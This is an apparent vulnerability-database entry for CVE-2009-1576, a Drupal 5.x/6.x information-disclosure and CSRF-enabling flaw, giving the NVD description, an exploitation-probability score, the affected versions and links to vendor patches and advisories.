CVE-2009-1576

Name: CVE-2009-1576
Creator: NVD / NIST
Published: 2009-05-06T17:30:09.86+00:00
License: https://creativecommons.org/publicdomain/zero/1.0/

UnknownEPSS 1.63%

Last modified Jun 16, 2026

CVE-2009-1576 is a vulnerability of currently unknown severity. Unspecified vulnerability in Drupal 5.x before 5.17 and 6.x before 6.11, as used in vbDrupal before 5.17.0, allows user-assisted remote attackers to obtain sensitive information by tricking victims into visiting the front page of the site with a crafted URL and causing form data to be sent to an attacker-controlled site, possibly related to multiple / (slash) characters that are not properly handled by includes/bootstrap.inc, as demonstrated using the search box. NOTE: this vulnerability can be leveraged to conduct cross-site request forgery (CSRF) attacks.. EPSS estimates a 1.63% chance of exploitation in the next 30 days.

Description

Unspecified vulnerability in Drupal 5.x before 5.17 and 6.x before 6.11, as used in vbDrupal before 5.17.0, allows user-assisted remote attackers to obtain sensitive information by tricking victims into visiting the front page of the site with a crafted URL and causing form data to be sent to an attacker-controlled site, possibly related to multiple / (slash) characters that are not properly handled by includes/bootstrap.inc, as demonstrated using the search box. NOTE: this vulnerability can be leveraged to conduct cross-site request forgery (CSRF) attacks.

Metrics

EPSS Probability

1.63%

73.2th percentile

Probability of exploitation in the next 30 days. Learn more

Affected Software

Vendor	Product	Versions	Update
Drupal	Drupal	5.0	Beta1
Drupal	Drupal	5.1	—
Drupal	Drupal	5.1_rev1.1	—
Drupal	Drupal	5.10	—
Drupal	Drupal	5.11	—
Drupal	Drupal	5.12	—
Drupal	Drupal	5.13	—
Drupal	Drupal	5.14	—
Drupal	Drupal	5.15	—
Drupal	Drupal	5.16	—
Drupal	Drupal	6.0	Beta1
Drupal	Drupal	6.1	—
Drupal	Drupal	6.2	—
Drupal	Drupal	6.3	—
Drupal	Drupal	6.4	—
Drupal	Drupal	6.5	—
Drupal	Drupal	6.6	—
Drupal	Drupal	6.7	—
Drupal	Drupal	6.8	—
Drupal	Drupal	6.9	—
Drupal	Drupal	6.10	—

References

http://drupal.org/files/sa-core-2009-005/SA-CORE-2009-005-5.16.patchPatch
http://drupal.org/node/449078Patch, Vendor Advisory
http://secunia.com/advisories/34948Vendor Advisory
http://secunia.com/advisories/34950Vendor Advisory
http://secunia.com/advisories/34980
http://www.debian.org/security/2009/dsa-1792
http://www.osvdb.org/54153
http://www.vbdrupal.org/forum/showthread.php?p=9953#post9953Patch
http://www.vupen.com/english/advisories/2009/1216Vendor Advisory
https://www.redhat.com/archives/fedora-package-announce/2009-May/msg00108.htmlPatch
https://www.redhat.com/archives/fedora-package-announce/2009-May/msg00133.htmlPatch
http://drupal.org/files/sa-core-2009-005/SA-CORE-2009-005-5.16.patchPatch
http://drupal.org/node/449078Patch, Vendor Advisory
http://secunia.com/advisories/34948Vendor Advisory
http://secunia.com/advisories/34950Vendor Advisory
http://secunia.com/advisories/34980
http://www.debian.org/security/2009/dsa-1792
http://www.osvdb.org/54153
http://www.vbdrupal.org/forum/showthread.php?p=9953#post9953Patch
http://www.vupen.com/english/advisories/2009/1216Vendor Advisory
https://www.redhat.com/archives/fedora-package-announce/2009-May/msg00108.htmlPatch
https://www.redhat.com/archives/fedora-package-announce/2009-May/msg00133.htmlPatch

Timeline

Published: May 6, 2009
Last Modified: Jun 16, 2026
Status: Modified

Frequently Asked Questions

What is CVE-2009-1576?

How severe is CVE-2009-1576?

Severity scoring for CVE-2009-1576 is pending analysis. The EPSS model estimates a 1.63% probability of exploitation in the next 30 days.

How do I fix CVE-2009-1576?

Check the vendor references and advisories linked above for patched versions and mitigation guidance. You can also run a Strix scan to test if your systems are affected.

Are you affected by CVE-2009-1576?

Run a free Strix scan to check your systems for this vulnerability.

Scan your code now

Source: NVD / NIST